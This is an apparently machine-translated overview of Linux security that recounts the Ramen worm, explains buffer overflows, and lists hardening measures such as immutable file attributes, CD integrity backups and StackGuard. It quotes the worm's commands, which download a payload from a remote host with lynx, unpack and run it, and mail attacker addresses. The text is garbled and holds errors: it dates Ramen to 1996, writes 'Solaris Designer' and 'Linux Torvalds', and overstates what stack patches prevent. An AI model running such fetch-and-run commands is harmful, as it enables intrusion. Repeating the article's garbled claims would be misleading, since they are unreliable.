Linux security overview

Article Title: Linux security overview. Linux is a technology channel of the IT lab in China. Includes basic categories such as desktop applications, Linux system management, kernel research, embedded systems, and open source.
As Linux is an open-source free operating system, it is welcomed by more and more users. With the continuous popularization of Linux in China, the Linux operating system has always been regarded as an enemy of Microsoft's Windows software system, because it is not only secure, stable, and cost-effective, in addition, virus transmission is rare. However, as more servers, workstations, and PCs use Linux software, computer virus makers are also starting to attack the system. The Ramen virus was discovered in 1996 as the first virus in Linux. If the Linux virus showed only a concept at the beginning, the discovery of the Ramen Virus, it has started to cause people's worries. Although many people think that, strictly speaking, Reman cannot be called a virus, it has surprised many users who have hundreds of times more confidence in Linux security.
　　
We can see that from 1996 to the present, there are only a handful of new Linux viruses. This shows that Linux is a robust operating system with intrinsic virus immunity. Of course, in addition to its excellent design, it is also one of the reasons why Linux is rarely attacked by viruses. In fact, all operating systems (including DOS and Windows) were rarely intruded by various viruses at the beginning of their production. However, as Raimond Genes, European president of Trend Micro's anti-virus department, said, "Of course we will see more and more Windows attacks, but Linux will also become a target, because it is becoming more and more popular, it is a stable operating system, but it is not a completely secure system. In terms of LINUX, the reman, the first Linux virus in the world, has already appeared, after obtaining the relevant information and samples of the virus, we found that, strictly speaking, reman cannot be called a virus. In fact, this is an old "buffer overflow" attack program that already exists in the UNIX/Linux World. Almost all UNIX/Linux versions have such problems. The first such type of attack (morris worm) has been around for more than a decade, and it has not been around until now. In fact, buffer overflow attacks against windows 98/NT are also very common.
　　
The principle of buffer overflow is: copying a long string to a buffer with limited space, overwriting adjacent storage units, will cause program running to fail. Because automatic variables are stored in the stack, when a buffer overflow occurs, the reverse return address of the function stored in the stack will also be overwritten, so that the function cannot be normally returned from the overflow function (the return address is often an Invalid Address). In this case, the system generally reports: "core dump" or "segment fault ". Seriously: If the buffer is covered by a well-designed sequence of machine commands, it may overflow, change the return address, and direct it to its own sequence of commands, this changes the normal process of the program. This carefully-designed command generally aims at "/bin/sh", so this code is called "shell code ". Through this overflow, you can get a shell, that's all. However, if the program is a suid root program, a root shell is obtained. In this way, the control of the machine is easy, and everything that has happened since then is reasonable.
　　
Next we will return to reman. It first scans hosts on the network, uses two common vulnerabilities to enter the system, obtains root permissions, and then copies itself from the source host to continue scanning other servers on the Internet. For Red Hat 6.2, if the attack succeeds, it will do the following:
　　
Mkdir/usr/src/. poop; cd/usr/src/. poop
Export TERM = vt100
Lynx-source http: // FROMADDR: 27374>/usr/src/. poop/ramen. tgz
Cp ramen. tgz/tmp
Gzip-d ramen. tgz; tar-xvf ramen.tar;./start. sh
Echo Eat Your Ramen! | Mail-s TOADDR-c gb31337@hotmail.com gb31337@yahoo.com
　　
Obviously, reman is just an automated Buffer Overflow program, and it is quite common. Currently, the buffer overflow attack is a very common attack. The hacker website updates vulnerabilities of various systems almost daily. However, this attack method is not inevitable.
　　
But we still need to pay attention to LINUX security measures.
　　
1. in Linux, the file system installs separate primary partitions for different applications and sets the key partitions as read-only, which greatly improves the security of the file system. This mainly involves adding (only adding) and immutable attributes of Linux's ext2 file system.
　　
● The File System of Linux can be divided into several major partitions, and each partition is configured and installed separately, generally, at least/,/usr/local,/var,/home, and other partitions must be created. /Usr can be installed as read-only and can be considered unmodifiable. If any file in/usr has changed, the system will immediately issue a security alarm. Of course, this does not include the content in/usr changed by the user.
　　
The installation and configuration of/lib,/boot, And/sbin are the same. During installation, you should try to set them as read-only, and any modifications to their files, directories, and attributes will trigger system alarms.
　　
Of course, it is impossible to set all major partitions as read-only. Some partitions, such as/var, cannot be set as read-only because of their own nature, however, it should not be allowed to have execution permissions.
　　
● Extended ext2: only adding and immutable file attributes on the ext2 file system can further improve the security level. Immutable and just adding properties are only two ways to extend the attribute flag of the ext2 file system.
　　
An object marked as immutable cannot be modified or even modified by the root user. A file marked as only can be modified, but content can only be added after it, even if the root user can.
　　
You can use the chattr command to modify these attributes of a file. If you want to view the attributes, you can use the lsattr command. To learn more about the attributes of the ext2 file, Run man chattr. These two file attributes are useful when detecting hacker attempts to install intrusion backdoors in existing files. For the sake of security, once such activities are detected, they should be immediately blocked and alarm information should be issued.
　　
If your critical file system is installed as read-only and files are marked as immutable, intruders must reinstall the system to delete these Immutable files, but this immediately generates an alarm, this greatly reduces the chances of illegal intrusion.
　　
● Protecting log files when used together with log files and log backups is immutable and adding only these two file attributes is particularly useful. The system administrator should set the active log File Attribute to add only. When a log is updated, the attributes of the new log backup file should be set to immutable, and the attributes of the new active log file are changed to add-only. This usually requires adding some control commands in the log update script.
　　
2. After the Linux system is installed, the entire system should be backed up. In the future, you can verify the integrity of the system based on the backup. In this way, you can find whether the system file has been tampered with illegally. If the system file has been damaged, you can use the system backup to restore it to a normal state.
　　
● CD-ROM backup the best current system backup media is the CD-ROM disc, You can regularly compare the system disc content in the future to verify whether the integrity of the system is damaged. If you have a high security level requirement, you can set the disc to boot and verify the work as part of the system startup process. In this way, the system has not been damaged as long as the disk can be started.
　　
If you create a read-only partition, You can regularly reload them from the disc image. Even if it cannot be installed as a read-only partition like/boot,/lib, And/sbin, you can still check them based on the disc image, you can even download them from another secure image at startup.
　　
● Although many files in/etc may change frequently in other backup methods, many files in/etc can still be stored on a CD for system integrity verification. Other files that are not frequently modified can be backed up to another system (such as tape) or compressed to a read-only directory. In this way, additional system integrity checks can be performed on the basis of the verification using the CD image.
　　
Since the vast majority of operating systems are now available along with the CD, it is very convenient to create an emergency boot disk or verify disk for an CD-ROM, it is a very effective and feasible verification method.
　　
3. Improve the internal security mechanism of the system. Improve the internal functions of the Linux operating system to prevent buffer overflow attacks, which are extremely destructive but most difficult to prevent, although such improvement requires the system administrator to have a wealth of experience and skills, it is necessary for many Linux systems with high security requirements.
　　
● Security of Solaris Designer Linux patch Solaris Designer is used for security of 2.0 kernel Linux patch provides an unexecutable stack to reduce the threat of buffer overflow, thus greatly improving the security of the entire system.
　　
　　
Buffer overflow is quite difficult to implement because intruders must be able to determine when a potential buffer overflow will occur and where it will appear in the memory. It is also very difficult to prevent buffer overflow. The system administrator must completely remove the conditions of buffer overflow to prevent such attacks. Because of this, many people, even Linux Torvalds, think that this secure Linux patch is very important because it prevents all attacks using buffer overflow. However, it should be noted that these patches will also cause dependency on some programs and libraries on the execution stack, which also brings new challenges to the system administrator.
　　
Unexecutable stack patches have been distributed in many security email lists (such as securedistros@nl.linux.org) and are easily downloaded to them by users.
　　
● StackGuardStackGuard is a powerful Security Patch tool. You can use the gcc version patched by StackGuard to recompile and link key applications.
　　
Stack check is added during StackGuard compilation to prevent stack Attack Buffer Overflow, although this may cause a slight reduction in system performance, but StackGuard is still a very useful tool for specific applications with high security requirements.
　　
Now you have a Linux version that uses SafeGuard. It is easier for you to use StackGuard. Although the use of StackGuard will cause the system performance to decrease by about 10 ~ 20%, but it can prevent the entire buffer overflow.
　　
● The new access control function Linux kernel version 2.3 is trying to implement an access control list in the file system, which can be in the original three categories (owner, group, and other) add more detailed access control based on the access control mechanism.
　　
In linux kernels of versions 2.2 and 2.3, a new access control function will be developed, which will eventually affect the current ext2 file attributes. Compared with the traditional ext2 file system, it provides a more precise security control function. With this new feature, applications will be able to access certain system resources without the superuser permission, such as initial integration.
　　
● Rule Set-Based Access Control now the relevant Linux community is developing a rule-based Access Control